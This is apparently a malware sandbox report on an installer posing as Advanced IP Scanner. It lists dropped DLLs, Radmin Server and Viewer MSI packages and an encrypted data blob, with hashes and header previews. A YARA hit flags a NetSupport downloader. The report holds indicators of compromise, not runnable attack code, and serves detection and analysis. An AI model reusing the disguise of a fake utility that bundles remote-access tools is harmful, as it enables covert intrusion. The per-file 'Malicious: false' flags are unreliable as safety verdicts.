
Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.0606914357897885
Encrypted:	false
SSDEEP:	192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:	A20084F41B3F1C549D6625C790B72268
SHA1:	E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:	0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:	DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-VMB1B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1151016
Entropy (8bit):	6.482547207070433
Encrypted:	false
SSDEEP:	24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:	ED04DAB88E70661E4980A284B0DF6A0C
SHA1:	C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:	9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:	E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1180200
Entropy (8bit):	6.806814022865445
Encrypted:	false
SSDEEP:	24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
MD5:	C553D46852C7015A3DF581FBD2C02C3A
SHA1:	D768260F818EA400BE5AD8F86280FB92DD37F341
SHA-256:	F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
SHA-512:	42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.....:.h.;...:.h.?...:.h.>...:.h.9...:..;...:...;.n.:..<...:......:..>...:..:...:......:..8...:.Rich..:.........................PE..L......]...........!.........p......?........................................@.......3....@.........................p?......l...h.......@...............(..........P9..T............................9..@...............d............................text............................... ..`.rdata...C.......D..................@..@.data...<........^..................@....rsrc...@............@..............@..@.reloc..............F..............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\mac_interval_tree.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1614189
Entropy (8bit):	5.107077482480661
Encrypted:	false
SSDEEP:	49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
MD5:	7B844618B571CDACB552622844639A96
SHA1:	3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
SHA-256:	8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
SHA-512:	9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
Malicious:	false
Preview:	000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN

C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	300584
Entropy (8bit):	5.864906645133905
Encrypted:	false
SSDEEP:	6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
MD5:	E8D9421848C1DDEA1A74EBFDBE452C67
SHA1:	7F1302F2B64FF785ABF85F5A9579EA12E555233B
SHA-256:	3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
SHA-512:	2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\platforms\is-5NJTL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1384488
Entropy (8bit):	6.46559466851362
Encrypted:	false
SSDEEP:	24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
MD5:	A95683988952CD21F5F6DE5318122B98
SHA1:	2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
SHA-256:	10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
SHA-512:	33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1384488
Entropy (8bit):	6.46559466851362
Encrypted:	false
SSDEEP:	24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
MD5:	A95683988952CD21F5F6DE5318122B98
SHA1:	2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
SHA-256:	10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
SHA-512:	33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RIP10.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51240
Entropy (8bit):	6.51849694585826
Encrypted:	false
SSDEEP:	1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
MD5:	1184F4FB8EFAE468729C62787C9ED80B
SHA1:	A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
SHA-256:	C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
SHA-512:	2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51240
Entropy (8bit):	6.51849694585826
Encrypted:	false
SSDEEP:	1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
MD5:	1184F4FB8EFAE468729C62787C9ED80B
SHA1:	A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
SHA-256:	C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
SHA-512:	2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\rserv35ml.msi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Server 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Server 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Server 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {BBD285CD-D1FE-41B1-B6B4-7FF7C27F553B}, Last Saved Time/Date: Thu Dec 14 03:24:15 2017, Create Time/Date: Thu Dec 14 03:24:15 2017, Last Printed: Thu Dec 14 03:24:15 2017, Code page: 1252, Template: Intel;1033
Category:	dropped
Size (bytes):	6313984
Entropy (8bit):	7.80157349747762
Encrypted:	false
SSDEEP:	98304:p4Yy6oWmNbrsXB52VA7/YLiIwyxDdYYUPe7fA8ScWmMJ5TpBpB22Omi58:pP1mdrIiVe/cwyxpF7fHScWLjTbedfi
MD5:	7DBF077665F632BEA55C0D88B7F301A3
SHA1:	D1D0215FC874F72228BDDAFAB9FBEE5B816737B2
SHA-256:	AA584952E31F9C521C2D57AF5FAAFA876E78C512A4DAF0A76E11695EA126558A
SHA-512:	90BD7F02A7838AD83B6CC0E287038568994E07D26B42E66BD0474ADFC6A82299B612CEF01E570FD27EBCFB54B912F333DF91879CD348E06718E3622918368E8F
Malicious:	false
Preview:	......................>...................a...............8...................................y.......~........................................................................................................................................................................................................................................ ... ...!...!..."..L...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p............................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D...x...F...X...H...J.......K...L.......V...O...P...Q...R...S...T...U...G...W...J...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Program Files (x86)\Advanced IP Scanner\rview35ml.msi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Viewer 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Viewer 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Viewer 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {FAB726D2-8076-4144-B0E6-C4FC2A838845}, Last Saved Time/Date: Thu Dec 14 03:24:44 2017, Create Time/Date: Thu Dec 14 03:24:44 2017, Last Printed: Thu Dec 14 03:24:44 2017, Code page: 1252, Template: Intel;1033
Category:	dropped
Size (bytes):	5409792
Entropy (8bit):	7.888464776356177
Encrypted:	false
SSDEEP:	98304:/YyLObvirO9mCdfl2nus7iOlkwAI2ljeoKleOA56VJJ8bXSUvmdMjGerZSJi:FGKrofl2xG1ICGleD6DJ8DSUv+EJZSJi
MD5:	8E36ECA249C08969EF5C0822928416D6
SHA1:	1937E555B760B4A3E13667BE189A9A9B9C9FAF8C
SHA-256:	052EE17B1544F3E1466DF561D7BAAA4BB694320803102C96FCD3560BEEB3B5C3
SHA-512:	C7B9DE31660CD56AAC2D30C3EF4E5C041E6A1108B3B058EA08C2C9A08AD235398E15AE5FDC76263476864BB964443035F383EA3CB82FFA715D8583ABEB9C5AB1
Malicious:	false
Preview:	......................>...................S...............8....................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...0....................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D.......F...Y...H...J.......K...M...........W...P...Q...R...S...T...U...V...G...X.......Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Program Files (x86)\Advanced IP Scanner\service_probes (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	data
Category:	dropped
Size (bytes):	590271
Entropy (8bit):	7.998650752150742
Encrypted:	true
SSDEEP:	12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
MD5:	637FB65A1755C4B6DC1E0428E69B634E
SHA1:	FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
SHA-256:	B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
SHA-512:	F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
Malicious:	false
Preview:	.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.\|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q\|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.\|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282664
Entropy (8bit):	6.463228483563671
Encrypted:	false
SSDEEP:	6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
MD5:	BA337B8D1BC9F117F7605A2B79B10064
SHA1:	9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
SHA-256:	EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
SHA-512:	277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	900288
Entropy (8bit):	6.823623458577979
Encrypted:	false
SSDEEP:	24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
MD5:	3E0303F978818E5C944F5485792696FD
SHA1:	3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
SHA-256:	7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
SHA-512:	C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	InnoSetup Log Network Utility Pro {AABBCCD1-22D3-4EF4-88FF-123456789ABC}, version 0x418, 6118447 bytes, 226546\37\user\376\, C:\Program Files (x86)\Advanced IP Scanner
Category:	dropped
Size (bytes):	6118447
Entropy (8bit):	4.024187836985338
Encrypted:	false
SSDEEP:	49152:PUhdIwuUXCovf/Uy85lLJ0p8oiiFaS8rc92jyBPJcw:u
MD5:	D94AB192381A300C735530C7F629CB95
SHA1:	B2354085E8077228EE5A45D9585F6E6FC07EDC87
SHA-256:	843D80DB40B30CDF611C73D9EFCF4E542D6A5A294DAE3A7F06E67445AF57634A
SHA-512:	DE411B2FA1AE4373BCDD51ADC53ACAC7A7CF6695661ACE949F99A0574766E60FA71606DC82925F8504417508056D6717A4642A3A06F01DFFCB60ECC3C06141EE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security
Preview:	Inno Setup Uninstall Log (b)....................................{AABBCCD1-22D3-4EF4-88FF-123456789ABC}}.........................................................................................Network Utility Pro...................................................................................................................../\]..............................................................................................................................[.................2.2.6.5.4.6......b.r.o.k......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r....................O.. .......\..>T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u.....

C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3329597
Entropy (8bit):	6.563278634392228
Encrypted:	false
SSDEEP:	49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Pi:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334a
MD5:	CB7E324B491A203424BDF73E30AFD225
SHA1:	03D9E2D82301C50932B002F2D9493B6B67D14E77
SHA-256:	579605F32ECDFDC505D5B5D55E77E1E94D73688FE1A7A51C950166A3E13240DB
SHA-512:	283D735F448FDB0A6BC2D0D3CF6E2ACAACFC3E2FECD244609963B586AC53CC69A05AE7A7BCA14A19416FF4E7B0FC5744266F6715F665A1A8EF0BEA292D4EF3B8
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Nov 8 17:15:12 2024, mtime=Fri Nov 8 17:15:12 2024, atime=Fri Apr 29 18:13:52 2022, length=1681960, window=hide
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	4.594581163265138
Encrypted:	false
SSDEEP:	24:8mt+/nCEaNkdOEUaGZVUn4Ake/aoT5dcaGTUnKxdcaG7jaGOalUUDYaj2wqygm:8mt+/n1YkdO3awVKfJCydcaqKKdca6ji
MD5:	9B086B906D532259E63B29C6F1A39A54
SHA1:	AC295E9103D6DA97A87CF48897F683913CA00D47
SHA-256:	8AE5A35D177F3959807389AE8297694AA4E733C21C55FC8E42B5C972F559102A
SHA-512:	FBF18D923AAE3A70BC396006A31A2953CA32573C69958E0C289FC87A56A5A370C8B310D1EDEFB99E6136F48602ADCBC6E010726806E51AC38679E76576AFDB5A
Malicious:	false
